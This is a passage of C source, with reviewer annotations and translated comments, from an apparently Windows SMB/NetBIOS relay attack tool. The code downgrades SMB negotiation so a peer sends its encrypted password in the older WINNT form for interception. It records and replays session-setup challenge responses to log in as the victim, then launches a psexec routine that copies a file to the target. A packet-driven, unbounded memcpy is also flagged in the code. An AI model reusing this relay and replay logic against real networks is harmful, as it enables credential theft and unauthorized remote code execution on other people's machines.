  //  *(int *)(rnetinfo.buff+9)=0xc0000016;
      //       
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
   //       closesocket(rnetinfo.fd2);
    printf("\n get file name ok!");
    return(TRUE);
         }
   // 0x01 = TRANS2_FIND_FIRST2; same idea with the pattern at fixed offset 0x54.
   if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0)
   {
    memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rnetinfo.recvbytes-0x54);
 //      *(int *)(rnetinfo.buff+9)=0xc0000016;
             
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
 //       closesocket(rnetinfo.fd2);
  
    printf("\n get file name ok!");
    return(TRUE);
   }  
  }
      
     // 0x72 = SMB_COM_NEGOTIATE.
     if(rnetinfo.buff[0x8]==0x72)
  {
   if(rnetinfo.loginok==FALSE)
   {
   //  memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
     // Zero bytes 0xc..0xf of the client's negotiate request before it is
     // forwarded: the last status byte, Flags and Flags2.  Clearing Flags2
     // drops, among others, the extended-security, signing and Unicode bits,
     // which is what makes the downgrade below visible on the wire.
     memset(rnetinfo.buff+0xc,0,4);
                 rnetinfo.long72=rnetinfo.recvbytes;   // dead store (local copy); the real length comes from rnetchangepacket2()
         // (translated from the author's Chinese comments)
         // This is the flag for which features the system supports; WIN2000 and WINNT differ.
         // If one side is WINNT it is normally 0, but if both sides are WIN2000 the password
         // scheme later in the protocol is different.  Setting it to 0 tricks the peer into
         // sending the encrypted password the WINNT way so it can be intercepted; WIN2000 may
         // not support this well.
     //   printf("\n fd2 recv smb 0x72  packet ");
   }
   else
   {  
     // After login: answer the local client's negotiate with the negotiate
     // response saved from the real target (buff72/long72), after patching
     // TID/PID/UID/MID from the new request into it.
                        memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8);
      memcpy(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72);
      //  printf("\n send smb 0x72 packet .");
      // buff[0x25] is the response's DialectIndex; 5 presumably selects the
      // dialect at position 5 of the local client's list - confirm.
      rnetinfo.buff[0x25]=5;
        //run in win9x.the win9x netbios client use 
        // (translated) The client here may have to be WIN9X; unknown how WINNT/WIN2000 handle it.
      newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0);
      return(FALSE);
      rnetinfo.recvbytes=0;   // unreachable
             }
   
  }
     // 0x73 = SMB_COM_SESSION_SETUP_ANDX, 0x75 = SMB_COM_TREE_CONNECT_ANDX.
     if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
  {
           
   if(rnetinfo.loginok==FALSE)
   {
    // buff[0x33] is the OEM/LM password length of a session setup; 0x18 is
    // the size of a challenge response, so keep the whole request.
    if(rnetinfo.buff[0x33]==0x18)
       {
                 memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes); 
             }
    
    // Walk to the tree-connect path: i = AndXOffset of the chained block
    // (0x27), or 0x20 for a bare 0x75; j = its WordCount; then add the
    // word at i+0x0b (presumably the tree-connect password length) and the
    // fixed part 4+1+2*j+2 to land on the path string.
        i=*(WORD *)(rnetinfo.buff+0x27);
    if(rnetinfo.buff[0x8]==0x75) i=0x20;
             j=*(unsigned char *)(rnetinfo.buff+0x4+i);
    i+=*(WORD *)(rnetinfo.buff+i+0x0b);
    i=i+2*j+7;                 
    // BUG: i is built from packet fields, so buff+i can lie far outside the
    // BUFFSIZE+1-byte buffer; this 0x100-byte read is unbounded and
    // filename is not guaranteed to be NUL-terminated afterwards.
    memcpy(filename,rnetinfo.buff+i,sizeof(filename));
    // Collapse UTF-16 to one byte per character when the second byte is 0.
    j=1;
    if(filename[1]==0) j=2;
             for(i=0,k=0;i<0x100;i+=j,++k)
             {
                   name=filename[i];
                   filename[k]=name;
                             //   if(i==0&&name=='\\') k-=1;
             }
    // Keep the text after the last backslash, i.e. the share name.
    for(i=strlen(filename);i>0;--i)
    {
                        name=filename[i];
          if(name=='\\')
                        {
           strcpy(filename,filename+i+1);
              break;
      }
    }
            
   
    // Any share other than IPC$/ADMIN$ is taken as the local file name that
    // psexec() will copy to the target (see waitfd4).
    if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0)
    {
   
        strcpy(rnetinfo.filename,filename);
     printf("\n file name=%s",filename);
  //  closesocket(rnetinfo.fd2);
  //  printf("\n the new get file name ok!");
        return(TRUE);
             } 
         } 
   else{
           
   
      // After login: the local client's session setup gets the recorded
      // LM/NT responses and account name (changepass) and the UID the
      // target assigned to the recorded session (buff73ok+0x20).
      if(rnetinfo.buff[0x33]==0x18)
   {
      //      printf("\n send login ok packet.");
       //     printf("\n send login ok packet.");
       //     newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0);
  // return;
       changepass(&rnetinfo.buff,&rnetinfo.buff73);
                memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2);  //user id
   }
   }
  }
     // NBSS session request (0x81).
     if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0) 
  {
   if(rnetinfo.loginok==FALSE) 
         {
       // Substitute the request built by nameuncode() (called name
       // *SMBSERVER, calling name = our own address).
       rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
       //      printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
         }
   else 
         {
       // The target session already exists: answer the local client with
       // a positive session response (0x82) ourselves.
       rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0);
           //  
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
        //     printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
   }
     }
  else
  {
   // Everything else goes to the target as-is (apart from the in-place
   // edits above); both branches do the same thing.
   if(rnetinfo.loginok==FALSE) 
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
         else
   {
  //  memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8);
       
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);  
         } 

    //  printf("\n send fd3 0x%x 0x%x 
bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
 
  }
     return(FALSE);
}
      
 
/*
 * Handle one packet from the target (fd3) and forward it unchanged to the
 * current client-side socket rnetinfo.fd.  Before login it also records two
 * packets for later replay/splicing by rnetchangepacket():
 *   - the negotiate response (0x72) into buff72, length via long72add;
 *   - the first session-setup/tree-connect response (0x73/0x75) with NT
 *     status 0 that follows a recorded 0x18-length session setup, into
 *     buff73ok, length via long73okadd ("now login ok!").
 * Always returns FALSE; loginok itself is set by waitfd4().
 *
 * NOTE(review): rnetinfo.fd is first assigned at the end of rnetbios()'s
 * loop, so a target packet arriving during the very first iteration would be
 * sent to an unset socket - in practice the target only answers after the
 * client's session request has been forwarded.  The two `if` blocks around
 * the newsend() are empty (their bodies are commented out).
 */
BOOL  rnetchangepacket2(RNET *rnetinfoadd)
{
  RNET rnetinfo=*rnetinfoadd;      // by-value copy; lengths are written back through the *add pointers
     if(rnetinfo.buff[0x8]==0x72)
  {
   if(rnetinfo.loginok==FALSE){
     memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
   //  memset(rnetinfo.buff+0xc,0,4);
                 *rnetinfo.long72add=rnetinfo.recvbytes;
     
             }
   
  }
     if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
  {
             // buff+9 is the 4-byte NT status (unaligned read); 0 = success.
             if(*(int 
*)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE)
    {
                  memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes);
                  *rnetinfo.long73okadd=rnetinfo.recvbytes;
               //   rnetinfo.loginok=TRUE; 
      //   closesocket(rnetinfo.fd2);
      printf("\n now login ok!");
              // rnetinfo.recvbytes=0;  
   //   return(TRUE);
              }
    
  }

    
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
  {
   //     *(int *)(rnetinfo.buff+9)=0xc0000016;
  }  
  rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0);   // result stored in the local copy only
     
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
  {
    //  closesocket(rnetinfo.fd2);
      //   return(TRUE);
  }  
      //   printf("\n send fd 0x%x 0x%x 
bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
     return(FALSE);
}
      
/*
 * Called by rnetbios() once a share/path name has been captured.  Marks the
 * session as logged in, starts the psexec() thread pointed at this slot's own
 * listener address (iprnetbios) with the captured name as the local file to
 * copy, then waits until either that thread exits or the local SMB client
 * connects to socketserver from ippsexec; that accepted socket is stored in
 * rnetinfo->fd4 and rnetbios() relays it from then on.  Returns the thread
 * handle as an int.
 *
 * NOTE(review): `char *ipbuff[0x100]` is an array of 256 pointers used as a
 * character buffer, and `psinfo.ip=&ipbuff` passes its address with the wrong
 * type - it works only because the address is the same.  psinfo is a stack
 * local handed to the new thread; psexec() copies it at entry, and this
 * function does not return before the thread has reported back, which is what
 * keeps that safe.  The wait loop polls accept() every 5 ms with no timeout.
 */
int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd)
{
// RNET     rnetinfo=*rnet;
 RSERVER  rinfo=*rinfoadd;
 int i,j,k,threadhandle,exitcode;   // threadhandle holds a HANDLE
 unsigned char name;
 char *ipbuff[0x100];
 PSINFO   psinfo;
    struct  sockaddr_in s_in1,s_in2,s_in4;
    struct sockaddr addr2;
    DWORD       ThreadID;
                             rnetinfo->loginok=TRUE;
                             s_in1.sin_addr.s_addr=rinfo.iprnetbios;
                 wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
                             psinfo.ip=&ipbuff;
/*
        i=*(WORD *)(rnetinfo->buff73+0x27);
                            j=*(unsigned char *)(rnetinfo->buff73+0x4+i);
        i+=*(WORD *)(rnetinfo->buff73+i+0x0b);
        i=i+2*j+7;                 
        psinfo.filename=rnetinfo->buff73+i;
        j=1;
        if(psinfo.filename[1]==0) j=2;
                             for(i=0,k=0;i<0x100;i+=j,++k)
                             {
                                name=psinfo.filename[i];
                                psinfo.filename[k]=name;
                             //   if(i==0&&name=='\\') k-=1;
                             }
        for(i=strlen(psinfo.filename);i>0;--i)
        {
                                  name=psinfo.filename[i];
          if(name=='\\')
                                  {
             strcpy(psinfo.filename,psinfo.filename+i+1);
          break;
                                  }
                             }
*/
   
                    psinfo.filename=rnetinfo->filename;
                             // Normalise the captured name in place: collapse UTF-16 when the
                             // second byte is 0, and drop one leading backslash (k-=1 at i==0).
                             j=1;
        if(rnetinfo->filename[1]==0) j=2;
                             for(i=0,k=0;i<0x100;i+=j,++k)
                             {
                                name=rnetinfo->filename[i];
                                rnetinfo->filename[k]=name;
                                if(i==0&&name=='\\') k-=1;
                             }

        printf("\n filename=%s\n",psinfo.filename);
                 
threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(LPVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID);
      // break;
        while(1){
         Sleep(5);
                                       if(rnetinfo->loginok==TRUE)   // always TRUE here (set above)
            {
                                          
i=GetExitCodeThread(threadhandle,&exitcode);
                           if(i==1&&exitcode!=STILL_ACTIVE){
                    //       printf("\n psexec exit 0x%x code",exitcode);
                           break;
            }
            }
                                  
                                 i=sizeof(struct sockaddr);
                     // socketserver is non-blocking (rnetbios), so this normally returns -1
                     // immediately; fd4 is overwritten on every pass.
                     rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i);
         
                                 memcpy(&s_in4,&addr2,15);   // 15 of 16 bytes; family/port/addr are within the first 8
         if(rnetinfo->fd4>0)
         {
          // Only the local client (argv[4]) may use this listener.
          if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){
               printf("\n fd4 error.");
            closesocket(rnetinfo->fd4);
          }
                                     else
          { 
          printf("\n fd4 ok! ip=%s",ipbuff);
          break;
          }
         }
        }
                          
  return(threadhandle);
}
                                          